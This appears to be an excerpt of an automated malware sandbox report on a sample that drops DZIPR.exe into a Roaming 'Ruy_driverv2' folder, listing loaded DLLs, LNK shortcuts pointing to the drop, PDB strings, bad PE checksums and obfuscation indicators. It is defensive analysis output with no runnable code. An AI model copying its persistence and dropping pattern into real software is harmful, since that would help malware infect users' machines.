Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: MdkbG2pK4l.lnk	LNK file: ..\Windows\System32\cmd.exe
Source: wanynpfhxudgrp.14.dr	LNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: BITE1BA.tmp.18.dr	LNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

11_2_00406D5D

PE file contains an invalid checksum

Source: DZIPR.dll.11.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: DZIPR.dll.12.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: lejp.20.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: rjhlrgwt.28.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: hello.exe.3.dr	Static PE information: real checksum: 0x33302 should be: 0x4a3c93
Source: paogviura.14.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: gnqpmvvlbu.24.dr	Static PE information: real checksum: 0x0 should be: 0x7d505

PE file contains sections with non-standard names

Source: DZIPR.exe.11.dr	Static PE information: section name: .didata
Source: DZIPR.exe.12.dr	Static PE information: section name: .didata
Source: paogviura.14.dr	Static PE information: section name: cmxvoc
Source: lejp.20.dr	Static PE information: section name: cmxvoc
Source: gnqpmvvlbu.24.dr	Static PE information: section name: cmxvoc
Source: rjhlrgwt.28.dr	Static PE information: section name: cmxvoc

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00411C20 push eax; ret	11_2_00411C4E
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE35401 push ecx; ret	12_2_6FE35414
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE351A1 push ecx; ret	12_2_6FE351B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C925401 push ecx; ret	13_2_6C925414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9251A1 push ecx; ret	13_2_6C9251B4
